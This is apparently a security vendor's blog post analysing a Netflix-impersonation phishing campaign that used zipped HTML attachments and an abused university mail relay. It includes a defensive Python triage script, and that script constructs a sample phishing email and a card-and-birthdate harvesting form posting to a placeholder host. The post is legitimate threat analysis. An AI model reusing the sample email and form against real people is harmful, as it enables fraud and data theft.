How Netflix Bad Actors Went Behind The Scenes To Stage A Credential Harvesting Heist

What better place for a phish to hide than in a stream? A streaming service, that is. Streamable in more than 30 languages and 190 countries, Netflix is the largest on-demand movie and TV streaming service around. They’re also the focus of our latest phishing article.

Netflix has amassed over 220 million subscribers, which also makes it a leading target for brand impersonation. Media reports have warned of numerous phishing threats over the years, many of which share a common theme: personal information. Phishers send emails that attempt to trick Netflix users into "updating" their credit card details and other personally identifiable information (PII).

Earlier attempts at brand fraud carried many tell-tale signs. Numerous typos, odd word choices, suspicious URLs, and a strange overall appearance gave phishing emails away. With time, these particular indicators have become obsolete. Cybercrime grows more sophisticated every year, with no sign of slowing down. Today, many tell-tale signs of brand impersonation are so cleverly hidden that even the most discerning eye cannot spot them.

Recently, Terraeagle found Netflix being impersonated in a PII-harvesting campaign that used malicious HTML attachments compressed in zip files.

Because the phishing page ships as an attachment, it is hosted on the recipient's local machine rather than on the world wide web. Typical URL reputation checks are bypassed, and the phishing content cannot be scanned or taken down because it is never hosted online. Wrapping the HTML in a ZIP file gives the attacker a further advantage: it is not an executable format, and its contents cannot be previewed.

In this campaign, sender email addresses were spoofed to imitate Netflix's real domain. The phishers were able to route these phishing emails through a mail server controlled by a Peruvian university.


In this example, the email headers (which record the path of servers the message traversed) show that the email originated from 43.157.12.254 and that the university's mail server accepted it before relaying it on to Microsoft Outlook servers. Through this relay path, the phishing message obtained a DKIM pass from an established university's domain.

Recipients were instructed to resolve an account issue by downloading a form attached to the email.


A zip file is the only attachment in this email. Opening it unzips an HTML attachment that builds a PII-harvesting form (billing address, credit card information, date of birth, etc.) hosted on the recipient's local machine.


By clicking the Agree and Continue button, the victim sends this data straight to a bad actor. Close scrutiny of the HTML file's code reveals that the form uses the HTTP POST method (to a PHP handler) to send the entered details from the recipient's local system to a third-party server under the bad actor's control.


The form's action attribute specifies which server the data is sent to when the form is submitted. In this case, it is a hijacked server belonging to a Pakistani concrete manufacturing company.
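The form-action check described above, turned into a small triage script. This is an added example, not code from Terraeagle or from the campaign; the message, zip, HTML form and the host name compromised-example.invalid are all constructed placeholders. It unpacks zipped HTML attachments from a raw email and flags any form that POSTs to a host outside a trusted-domain list.

```python
import email
import io
import re
import zipfile
from email import policy
from email.message import EmailMessage
from urllib.parse import urlparse

# Constructed sample HTML: a "billing" form of the kind described above, posting
# PII to a third-party host (placeholder name, not a real indicator).
SAMPLE_HTML = b"""<html><body><h1>Update your billing information</h1>
<form action="https://compromised-example.invalid/netflix/post.php" method="post">
<input name="card"><input name="dob"><button>Agree and Continue</button>
</form></body></html>"""

FORM_RE = re.compile(r"<form\b[^>]*>", re.I)              # every <form ...> opening tag
ATTR_RE = re.compile(r'(\w+)\s*=\s*["\']?([^"\'\s>]+)')   # attribute=value pairs in a tag

def build_sample_email() -> bytes:
    """Build a constructed phishing-style message with a zipped HTML attachment."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Netflix_Form.html", SAMPLE_HTML)
    msg = EmailMessage()
    msg["From"] = "Netflix <noreply@netflix.example>"   # spoofed display name, constructed
    msg["To"] = "user@university.example"
    msg["Subject"] = "Action required: billing issue"
    msg.set_content("Please download the attached form to resolve your account issue.")
    msg.add_attachment(buf.getvalue(), maintype="application", subtype="zip", filename="form.zip")
    return msg.as_bytes()

def html_from_zip_attachments(raw: bytes):
    """Yield (filename, html_bytes) for every HTML file found inside zip attachments."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    for part in msg.iter_attachments():
        if part.get_content_type() != "application/zip":
            continue
        with zipfile.ZipFile(io.BytesIO(part.get_payload(decode=True))) as zf:
            for name in zf.namelist():
                if name.lower().endswith((".htm", ".html")):
                    yield name, zf.read(name)

def suspicious_forms(raw: bytes, trusted_domains=("netflix.com",)):
    """Return (attachment, action, method) for forms that POST to a non-trusted host."""
    findings = []
    for name, html in html_from_zip_attachments(raw):
        for tag in FORM_RE.findall(html.decode("utf-8", "replace")):
            attrs = {k.lower(): v for k, v in ATTR_RE.findall(tag)}
            action, method = attrs.get("action", ""), attrs.get("method", "get").lower()
            host = urlparse(action).hostname or ""
            trusted = any(host == d or host.endswith("." + d) for d in trusted_domains)
            if method == "post" and not trusted:
                findings.append((name, action, method))
    return findings
```

Feed it a real .eml at the mail gateway or during triage and any hit gives you the attachment name and the exfiltration endpoint to block and report.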

Recap of Techniques

  • Brand impersonation - uses brand logos and trademarks to impersonate well-known brands.
  • Credential harvesting - occurs when a victim tries to log into what they think is the Netflix website but enters credentials into a form controlled by the phishers.
  • Email spoofing - tricking recipients into thinking an email came from a company or person they trust.
  • Abuse of a mail server - leverages a legitimate organization’s mail server to send phishing emails.
  • Malicious HTML attachments - encouraging recipients to open an attachment that harvests credentials locally skirts most anti-phishing technology.

Best Practices: Guidance and Recommendations

  1. Be cautious of zip file attachments, since these cannot be previewed. Use another channel to contact the sender and confirm that the attachment is safe.
  2. An account issue can be resolved by visiting the company's website directly instead of clicking on email attachments and links.
  3. Check your browser's address bar to confirm that you are on a website rather than a local file, and hover over links to see where they actually lead.
  4. To prevent open mail relay abuse, SMTP servers should not be configured to accept and forward email from non-local IP addresses to non-local mailboxes for unauthenticated, unauthorized users.

Fortunately, this story had a happy ending. But that is not always the case. Without a third-party email security platform in place, your company could find itself playing a leading role in an upcoming phishing horror story. Stay phish-free instead. Contact Terraeagle today.

isoftware store

Business Owner at isoftwarestore

2 years

nice
